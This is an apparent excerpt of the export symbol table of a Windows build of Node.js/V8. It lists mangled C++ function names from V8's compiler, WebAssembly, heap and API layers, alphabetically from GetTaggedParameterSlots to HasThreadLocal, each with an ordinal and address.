                                  ?GetTaggedParameterSlots@CallDescriptor@compiler@internal@v8@@QEBAHXZ68250x140e68310
                                  ?GetTaggedPointerRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z68260x140fff260
                                  ?GetTaggedRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@VTruncation@234@@Z68270x140fff5f0
                                  ?GetTaggedSignedRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z68280x140fffb70
                                  ?GetTarget@Proxy@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ68290x140a8f200
                                  ?GetTarget@TransitionsAccessor@internal@v8@@QEAA?AVMap@23@H@Z68300x140423ae0
                                  ?GetTargetDetails@TransitionsAccessor@internal@v8@@SA?AVPropertyDetails@23@VName@23@VMap@23@@Z68310x140423b50
                                  ?GetTargetFromRaw@TransitionsAccessor@internal@v8@@CA?AVMap@23@VMaybeObject@23@@Z68320x140423b80
                                  ?GetTemplateObject@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KH@Z68330x140894720
                                  ?GetTemplateObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Handle@VTemplateObjectDescription@internal@v8@@@34@V?$Handle@VSharedFunctionInfo@internal@v8@@@34@AEBUFeedbackSource@234@@Z68340x140eae040
                                  ?GetTemplateObject@SharedFunctionInfoRef@compiler@internal@v8@@QEAA?AVJSArrayRef@234@VTemplateObjectDescriptionRef@234@AEBUFeedbackSource@234@W4SerializationPolicy@234@@Z68350x140de3830
                                  ?GetTempsCountForTailCallFromJSFunction@InstructionSelector@compiler@internal@v8@@AEAAHXZ68360x14041c2b0
                                  ?GetThread@WasmInterpreter@wasm@internal@v8@@QEAAPEAVThread@1234@H@Z68370x140557670
                                  ?GetThreadCount@WasmInterpreter@wasm@internal@v8@@QEAAHXZ68380x140077d70
                                  ?GetThreadInWasmThreadLocalAddress@trap_handler@internal@v8@@YAPEAHXZ68390x1405f4970
                                  ?GetThreadLocal@Thread@base@v8@@SAPEAXH@Z68400x140dc0d70
                                  ?GetThreadLocalInt@Thread@base@v8@@SAHH@Z68410x140dbf3e0
                                  ?GetTitle@CpuProfile@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ68420x140a8f280
                                  ?GetToNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ68430x140076c50
                                  ?GetToPrimitive@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z68440x140a8f2e0
                                  ?GetToStringTag@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z68450x140a8f2f0
                                  ?GetTop@FrameSummary@internal@v8@@SA?AV123@PEBVStandardFrame@23@@Z68460x14098a1a0
                                  ?GetTopDownRoot@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@XZ68470x14029f100
                                  ?GetTotalAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ68480x140fb29b0
                                  ?GetTotalAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ68490x140fb2a10
                                  ?GetTotalFrameSlotCount@Frame@compiler@internal@v8@@QEBAHXZ68500x140076a10
                                  ?GetTotalInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z68510x140e43700
                                  ?GetTraceNodeId@AddressToTraceMap@internal@v8@@QEAAI_K@Z68520x1406e9610
                                  ?GetTracingController@TraceEventHelper@tracing@internal@v8@@SAPEAVTracingController@4@XZ68530x1405f5fd0
                                  ?GetTracingController@node@@YAPEAVTracingController@v8@@XZ68540x1400c9610
                                  ?GetTrapReason@Thread@WasmInterpreter@wasm@internal@v8@@QEAA?AW4TrapReason@345@XZ68550x14027f710
                                  ?GetTrivialHash@StringHasher@internal@v8@@SAIH@Z68560x140423b90
                                  ?GetTurboCfgFileName@Isolate@internal@v8@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAV123@@Z68570x14097e690
                                  ?GetTurboStatistics@Isolate@internal@v8@@QEAAPEAVCompilationStatistics@23@XZ68580x14097e900
                                  ?GetType@HeapGraphEdge@v8@@QEBA?AW4Type@12@XZ68590x140455510
                                  ?GetType@HeapGraphNode@v8@@QEBA?AW4Type@12@XZ68600x140a8f300
                                  ?GetType@NodeProperties@compiler@internal@v8@@SA?AVType@234@PEAVNode@234@@Z68610x14045b350
                                  ?GetTypeInfo@CFunction@v8@@QEBAPEBVCFunctionInfo@2@XZ68620x140076c50
                                  ?GetTypeOrAny@NodeProperties@compiler@internal@v8@@SA?AVType@234@PEAVNode@234@@Z68630x140e447f0
                                  ?GetTypeProfile@FeedbackNexus@internal@v8@@QEBA?AVJSObject@23@XZ68640x1407f89c0
                                  ?GetTypedArrayStringTag@JSHeapBroker@compiler@internal@v8@@QEAA?AVStringRef@234@W4ElementsKind@34@@Z68650x140de3c80
                                  ?GetTypesForSourcePositions@FeedbackNexus@internal@v8@@QEBA?AV?$vector@V?$Handle@VString@internal@v8@@@internal@v8@@V?$allocator@V?$Handle@VString@internal@v8@@@internal@v8@@@std@@@std@@I@Z68660x1407f8b10
                                  ?GetUnboundModuleScript@Module@v8@@QEAA?AV?$Local@VUnboundModuleScript@v8@@@2@XZ68670x140a8f310
                                  ?GetUnboundScript@Script@v8@@QEAA?AV?$Local@VUnboundScript@v8@@@2@XZ68680x140a8f430
                                  ?GetUnresolvedPrivateNameTail@ClassScope@internal@v8@@QEAA?AVIterator@?$ThreadedListBase@VVariableProxy@internal@v8@@UEmptyBase@base@3@UUnresolvedNext@123@@base@3@XZ68690x140a55690
                                  ?GetUnscopables@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z68700x140a8f4b0
                                  ?GetUnsignedImmediateOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAIH@Z68710x14089b020
                                  ?GetUnsignedOperand@BytecodeArrayAccessor@interpreter@internal@v8@@AEBAIHW4OperandType@234@@Z68720x14089b030
                                  ?GetUnwindInfo@Assembler@internal@v8@@QEBA?AVBuiltinUnwindInfo@win64_unwindinfo@23@XZ68730x1404a11b0
                                  ?GetUnwindState@Isolate@v8@@QEAA?AUUnwindState@2@XZ68740x140a8f4c0
                                  ?GetUsePtr@Node@compiler@internal@v8@@AEAAPEAUUse@1234@H@Z68750x14045b360
                                  ?GetUserTime@OS@base@v8@@SAHPEAI0@Z68760x140dc0d80
                                  ?GetVFormatted@StringsStorage@internal@v8@@AEAAPEBDPEBDPEAD@Z68770x1406cda10
                                  ?GetValue@Descriptor@internal@v8@@QEBA?AVMaybeObjectHandle@23@XZ68780x140423ba0
                                  ?GetValueInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z68790x14045b390
                                  ?GetValuesNodeFromCache@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@PEAPEAV5234@_KVSparseInputMask@234@@Z68800x140ea8440
                                  ?GetVariableMode@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4VariableMode@23@W4Kind@ClassLiteralProperty@23@@Z68810x1406fb1f0
                                  ?GetVersion@V8@v8@@SAPEBDXZ68820x14051a740
                                  ?GetVersion@Version@internal@v8@@SAPEBDXZ68830x14051a740
                                  ?GetVirtualRegister@InstructionSelector@compiler@internal@v8@@QEAAHPEBVNode@234@@Z68840x140e371b0
                                  ?GetVirtualRegistersForTesting@InstructionSelector@compiler@internal@v8@@QEBA?BV?$map@IHU?$less@I@std@@V?$allocator@U?$pair@$$CBIH@std@@@2@@std@@XZ68850x140e37200
                                  ?GetVisitorId@Map@internal@v8@@SA?AW4VisitorId@23@V123@@Z68860x140793730
                                  ?GetWasmCallDescriptor@compiler@internal@v8@@YAPEAVCallDescriptor@123@PEAVZone@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@W4UseRetpoline@WasmGraphBuilder@123@W4WasmCallKind@123@@Z68870x140e5e020
                                  ?GetWasmEngine@WasmEngine@wasm@internal@v8@@SA?AV?$shared_ptr@VWasmEngine@wasm@internal@v8@@@std@@XZ68880x14055fb20
                                  ?GetWasmFunctionIndex@Message@v8@@QEBAHXZ68890x140a8f620
                                  ?GetWasmModuleFromId@Delegate@ValueDeserializer@v8@@UEAA?AV?$MaybeLocal@VWasmModuleObject@v8@@@3@PEAVIsolate@3@I@Z68900x140a8e1f0
                                  ?GetWasmModuleTransferId@Delegate@ValueSerializer@v8@@UEAA?AV?$Maybe@I@3@PEAVIsolate@3@V?$Local@VWasmModuleObject@v8@@@3@@Z68910x140a8f810
                                  ?GetWasmSourceMap@NativeModule@wasm@internal@v8@@QEBAPEAVWasmModuleSourceMap@234@XZ68920x14029f050
                                  ?GetWireBytesRef@CompiledWasmModule@v8@@QEAA?AV?$MemorySpan@$$CBE@2@XZ68930x140a8f820
                                  ?GetWireBytesStorage@CompilationState@wasm@internal@v8@@QEBA?AV?$shared_ptr@VWireBytesStorage@wasm@internal@v8@@@std@@XZ68940x140595220
                                  ?GetWireFormatVersion@ValueDeserializer@v8@@QEBAIXZ68950x140a8f840
                                  ?GetWord32RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z68960x141000010
                                  ?GetWord64RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z68970x1410008b0
                                  ?GetWorkingSpace@StateValuesCache@compiler@internal@v8@@AEAAPEAV?$array@PEAVNode@compiler@internal@v8@@$07@std@@_K@Z68980x140ea85a0
                                  ?GetWrappedFunction@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@V?$Handle@VFixedArray@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@AEBUScriptDetails@123@VScriptOriginOptions@3@PEAVScriptData@23@W4CompileOptions@ScriptCompiler@3@W4NoCacheReason@ScriptCompiler@3@@Z68990x1409f3f20
                                  ?GetterCallbackEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z69000x1400768e0
                                  ?GetterCallbackEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z69010x1406d2a10
                                  ?Glb@BitsetType@compiler@internal@v8@@SAINN@Z69020x140e2f030
                                  ?Global@Context@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ69030x140a8f870
                                  ?GlobalConstantFor@Factory@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z69040x140946560
                                  ?GlobalIndex@AsmJsScanner@internal@v8@@SA_KH@Z69050x140a67510
                                  ?GlobalSizeOfObjects@Heap@internal@v8@@QEAA_KXZ69060x140932330
                                  ?GlobalTearDown@WasmEngine@wasm@internal@v8@@SAXXZ69070x14055fb60
                                  ?GlobalizeReference@V8@v8@@CAPEA_KPEAVIsolate@internal@2@PEA_K@Z69080x140a8fc90
                                  ?GlobalizeTracedReference@V8@v8@@CAPEA_KPEAVIsolate@internal@2@PEA_K1_N@Z69090x140a8fd50
                                  ?GoTo@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z69100x1406ca2c0
                                  ?GoTo@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z69110x1404469c0
                                  ?GoToEnd@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXXZ69120x14088a0c0
                                  ?GoToIndex@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXH@Z69130x14088a100
                                  ?GoToStart@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXXZ69140x14088a130
                                  ?Goto@CodeAssembler@compiler@internal@v8@@QEAAXPEAVCodeAssemblerLabel@234@@Z69150x140e6e720
                                  ?Goto@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVRawMachineLabel@234@@Z69160x140ee2460
                                  ?GotoBasicBlock@GraphAssembler@compiler@internal@v8@@IEAAXPEAVBasicBlock@234@@Z69170x140ec52a0
                                  ?GotoIf@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@@Z69180x140e6e760
                                  ?GotoIfBasicBlock@GraphAssembler@compiler@internal@v8@@IEAAXPEAVBasicBlock@234@PEAVNode@234@W4Value@IrOpcode@234@@Z69190x140ec52c0
                                  ?GotoIfNot@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@@Z69200x140e6e850
                                  ?GreaterThan@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CompareOperationHint@34@@Z69210x140eae110
                                  ?GreaterThanOrEqual@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CompareOperationHint@34@@Z69220x140eae210
                                  ?Grow@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@@Z69230x14075f890
                                  ?Grow@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@@Z69240x14075f900
                                  ?Grow@NewSpace@internal@v8@@QEAAXXZ69250x1408d3420
                                  ?Grow@ValueNumberingReducer@compiler@internal@v8@@AEAAXXZ69260x140fec740
                                  ?Grow@WasmMemoryObject@internal@v8@@SAHPEAVIsolate@23@V?$Handle@VWasmMemoryObject@internal@v8@@@23@I@Z69270x140521550
                                  ?Grow@WasmTableObject@internal@v8@@SAHPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@IV?$Handle@VObject@internal@v8@@@23@@Z69280x140521c00
                                  ?GrowBuffer@Assembler@internal@v8@@AEAAXXZ69290x1404a1250
                                  ?GrowOSRCache@OSROptimizedCodeCache@internal@v8@@CAHV?$Handle@VNativeContext@internal@v8@@@23@PEAV?$Handle@VOSROptimizedCodeCache@internal@v8@@@23@@Z69300x14075bec0
                                  ?GrowRegisterMap@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXVRegister@234@@Z69310x140871390
                                  ?GrowWasmMemoryInPlace@BackingStore@internal@v8@@QEAA?AV?$Optional@_K@base@3@PEAVIsolate@23@_K1@Z69320x14083ec50
                                  ?GrowingFactor@?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@SANPEAVHeap@23@_KNN@Z69330x14093e1b0
                                  ?GrowingFactor@?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@SANPEAVHeap@23@_KNN@Z69340x14093e2a0
                                  ?GuaranteedAllocatable@FreeListFastAlloc@internal@v8@@UEAA_K_K@Z69350x140423bb0
                                  ?GuaranteedAllocatable@FreeListLegacy@internal@v8@@UEAA_K_K@Z69360x140423bd0
                                  ?GuaranteedAllocatable@FreeListMany@internal@v8@@UEAA_K_K@Z69370x1408d3630
                                  ?GuaranteedAllocatable@FreeListMap@internal@v8@@UEAA_K_K@Z69380x140076870
                                  ?HandleDebugBreak@Debug@internal@v8@@QEAAXW4IgnoreBreakMode@23@@Z69390x1409c15d0
                                  ?HandleDebuggerStatement@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z69400x1409f95b0
                                  ?HandleException@CodeAssembler@compiler@internal@v8@@AEAAXPEAVNode@234@@Z69410x140e6e940
                                  ?HandleInterrupts@StackGuard@internal@v8@@QEAA?AVObject@23@XZ69420x14096c980
                                  ?HandlerTableRangePrint@HandlerTable@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z69430x1409e8600
                                  ?HandlerTableReturnPrint@HandlerTable@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z69440x1409e8d70
                                  ?Has@Map@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z69450x140a8fe30
                                  ?Has@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z69460x140a90100
                                  ?Has@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z69470x140a903a0
                                  ?Has@ObjectHashSet@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z69480x140423c20
                                  ?Has@ObjectHashSet@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@H@Z69490x140423d20
                                  ?Has@Set@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z69500x140a90700
                                  ?Has@StringSet@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@@Z69510x1407796c0
                                  ?HasAccess@LookupIterator@internal@v8@@QEBA_NXZ69520x14079cef0
                                  ?HasAsyncEventDelegate@Isolate@internal@v8@@AEBA_NXZ69530x140423dd0
                                  ?HasBeenApplied@BookmarkScope@Scanner@internal@v8@@QEBA_NXZ69540x1406eaf50
                                  ?HasBeenSet@BookmarkScope@Scanner@internal@v8@@QEBA_NXZ69550x1406eaf60
                                  ?HasBlockCoverage@FunctionData@Coverage@debug@v8@@QEBA_NXZ69560x140a909d0
                                  ?HasBreakInfo@SharedFunctionInfo@internal@v8@@QEBA_NXZ69570x140779730
                                  ?HasBreakInfo@SharedFunctionInfoRef@compiler@internal@v8@@QEBA_NXZ69580x140de3d90
                                  ?HasBuffer@ArrayBufferView@v8@@QEBA_NXZ69590x140a909e0
                                  ?HasBuiltinId@SharedFunctionInfoRef@compiler@internal@v8@@QEBA_NXZ69600x140de3e10
                                  ?HasBytecodeArray@SharedFunctionInfoRef@compiler@internal@v8@@QEBA_NXZ69610x140de3e90
                                  ?HasCaught@TryCatch@v8@@QEBA_NXZ69620x140a90a10
                                  ?HasCheckedSyntax@Parser@internal@v8@@AEAA_NXZ69630x1406fb220
                                  ?HasCode@NativeModule@wasm@internal@v8@@QEBA_NI@Z69640x140571930
                                  ?HasCodeWithTier@NativeModule@wasm@internal@v8@@QEBA_NIW4ExecutionTier@234@@Z69650x140571990
                                  ?HasContextExtension@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_K@Z69660x140eae310
                                  ?HasContextExtensionSlot@Scope@internal@v8@@QEBA_NXZ69670x140641dc0
                                  ?HasContextInput@OperatorProperties@compiler@internal@v8@@SA_NPEBVOperator@234@@Z69680x140e43760
                                  ?HasContextParameter@CallInterfaceDescriptor@internal@v8@@QEBA_NXZ69690x14045b430
                                  ?HasContextPromiseHooks@Isolate@internal@v8@@QEBA_NXZ69700x140423de0
                                  ?HasCurrent@CodeCommentsIterator@internal@v8@@QEBA_NXZ69710x1409fa0f0
                                  ?HasData@PreparseDataBuilder@internal@v8@@QEBA_NXZ69720x1407259c0
                                  ?HasDataForParent@PreparseDataBuilder@internal@v8@@QEBA_NXZ69730x1407259e0
                                  ?HasExternalBytes@NativeContextStats@internal@v8@@AEAA_NVMap@23@@Z69740x14090a4f0
                                  ?HasFPVirtualRegisters@InstructionSequence@compiler@internal@v8@@QEBA_NXZ69750x140453b10
                                  ?HasFeedback@JSHeapBroker@compiler@internal@v8@@QEBA_NAEBUFeedbackSource@234@@Z69760x140de3ff0
                                  ?HasFrameStateInput@OperatorProperties@compiler@internal@v8@@SA_NPEBVOperator@234@@Z69770x140e43780
                                  ?HasFunctionName@ScopeInfo@internal@v8@@QEBA_NXZ69780x140758ea0
                                  ?HasGeneralSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ69790x140e83ce0
                                  ?HasHandler@Promise@v8@@QEAA_NXZ69800x140a90a30
                                  ?HasHint@UsePosition@compiler@internal@v8@@QEBA_NXZ69810x140ef7990
                                  ?HasInPrototypeChain@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ69820x140eae3b0
                                  ?HasIndexedLookupInterceptor@Object@v8@@QEAA_NXZ69830x140a90b20
                                  ?HasInferredFunctionName@ScopeInfo@internal@v8@@QEBA_NXZ69840x140758ed0
                                  ?HasInnerFunctions@PreparseDataBuilder@internal@v8@@QEBA_NXZ69850x140725a00
                                  ?HasInstance@Buffer@node@@YA_NV?$Local@VObject@v8@@@v8@@@Z69860x1401dbb70
                                  ?HasInstance@Buffer@node@@YA_NV?$Local@VValue@v8@@@v8@@@Z69870x1401dbb70
                                  ?HasInstance@FunctionTemplate@v8@@QEAA_NV?$Local@VValue@v8@@@2@@Z69880x140a90b50
                                  ?HasIntegrityLevelTransitionTo@TransitionsAccessor@internal@v8@@QEAA_NVMap@23@PEAVSymbol@23@PEAW4PropertyAttributes@23@@Z69890x1407436f0
                                  ?HasIsolatePromiseHooks@Isolate@internal@v8@@AEBA_NXZ69900x140423df0
                                  ?HasKey@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashMap@23@VObject@23@@Z69910x14075f970
                                  ?HasKey@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashSet@23@VObject@23@@Z69920x14075f9a0
                                  ?HasKey@?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z69930x14075f9d0
                                  ?HasKey@?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z69940x14075fa20
                                  ?HasKey@?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z69950x14075fa70
                                  ?HasKey@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z69960x14075fb50
                                  ?HasKey@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z69970x14075fb70
                                  ?HasKey@SmallOrderedHashMap@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z69980x14075fb50
                                  ?HasKey@SmallOrderedHashSet@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z69990x14075fb70
                                  ?HasLazyCommits@OS@base@v8@@SA_NXZ70000x140077dd0
                                  ?HasLineTerminatorAfterNext@Scanner@internal@v8@@QEAA_NXZ70010x140423e00
                                  ?HasLineTerminatorBeforeNext@Scanner@internal@v8@@QEBA_NXZ70020x140423e20
                                  ?HasLocalsBlackList@ScopeInfo@internal@v8@@QEBA_NXZ70030x140758f00
                                  ?HasMicrotasksSuppressions@MicrotaskQueue@internal@v8@@QEBA_NXZ70040x140610230
                                  ?HasNamedCaptures@RegExpParser@internal@v8@@AEAA_NXZ70050x1406ab0b0
                                  ?HasNamedLookupInterceptor@Object@v8@@QEAA_NXZ70060x140a90c20
                                  ?HasNext@SpaceIterator@internal@v8@@QEAA_NXZ70070x1409326c0
                                  ?HasNoSpillType@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ70080x140e83cf0
                                  ?HasOneBytePrefix@String@internal@v8@@QEAA_NV?$Vector@$$CBD@23@@Z70090x140748b70
                                  ?HasOnlyStablePrototypesWithFastElements@MapRef@compiler@internal@v8@@QEAA_NPEAV?$ZoneVector@VMapRef@compiler@internal@v8@@@34@@Z70100x140de40a0
                                  ?HasOperand@UsePosition@compiler@internal@v8@@QEBA_NXZ70110x140532cf0
                                  ?HasOutput@Instruction@compiler@internal@v8@@QEBA_NXZ70120x140453b20
                                  ?HasOwnProperty@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z70130x1407baa40
                                  ?HasOwnProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z70140x140a90c50
                                  ?HasOwnProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z70150x140a90f50
                                  ?HasPages@PagedSpace@internal@v8@@IEAA_NXZ70160x140423e30
                                  ?HasPrepareStackTraceCallback@Isolate@internal@v8@@QEBA_NXZ70170x14097ea20
                                  ?HasPrivate@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VPrivate@v8@@@2@@Z70180x140a911b0
                                  ?HasProperty@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z70190x140eae3c0
                                  ?HasProperty@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@PEAVLookupIterator@23@@Z70200x1407bac00
                                  ?HasProperty@Operator@compiler@internal@v8@@QEBA_NW4Property@1234@@Z70210x14045b440
                                  ?HasRealIndexedProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z70220x140a911d0
                                  ?HasRealNamedCallbackProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z70230x140a91430
                                  ?HasRealNamedProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z70240x140a91690
                                  ?HasReferenceMap@Instruction@compiler@internal@v8@@QEBA_NXZ70250x140453b30
                                  ?HasRegisterAssigned@LiveRange@compiler@internal@v8@@QEBA_NXZ70260x140e83d00
                                  ?HasReplacementHigh@Int64Lowering@compiler@internal@v8@@AEAA_NPEAVNode@234@@Z70270x140ed3020
                                  ?HasReplacementLow@Int64Lowering@compiler@internal@v8@@AEAA_NPEAVNode@234@@Z70280x140ed3040
                                  ?HasRestrictedAllocatableRegisters@CallDescriptor@compiler@internal@v8@@QEBA_NXZ70290x14045b450
                                  ?HasRunningCompileJob@WasmEngine@wasm@internal@v8@@QEAA_NPEAVIsolate@34@@Z70300x14055fbc0
                                  ?HasSharedFunctionName@ScopeInfo@internal@v8@@QEBA_NXZ70310x140759020
                                  ?HasSimpleParameters@Scope@internal@v8@@QEAA_NXZ70320x140a556b0
                                  ?HasSimpleTransitionTo@TransitionsAccessor@internal@v8@@AEAA_NVMap@23@@Z70330x1407438e0
                                  ?HasSource@WasmModuleSourceMap@wasm@internal@v8@@QEBA_N_K0@Z70340x14052aaf0
                                  ?HasSpillOperand@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ70350x140e83d20
                                  ?HasSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ70360x140e83d30
                                  ?HasSufficientCapacityToAdd@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAA_NH@Z70370x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@QEAA_NH@Z70380x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA_NH@Z70390x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA_NH@Z70400x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA_NH@Z70410x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAA_NH@Z70420x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA_NH@Z70430x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA_NH@Z70440x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAA_NH@Z70450x140779c10
                                  ?HasSufficientCapacityToAdd@?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@QEAA_NH@Z70460x140779c10
                                  ?HasTerminated@TryCatch@v8@@QEBA_NXZ70470x14042b2f0
                                  ?HasThisReference@Scope@internal@v8@@QEBA_NXZ70480x140a556f0
                                  ?HasThreadLocal@Thread@base@v8@@SA_NH@Z70490x140dbf3f0
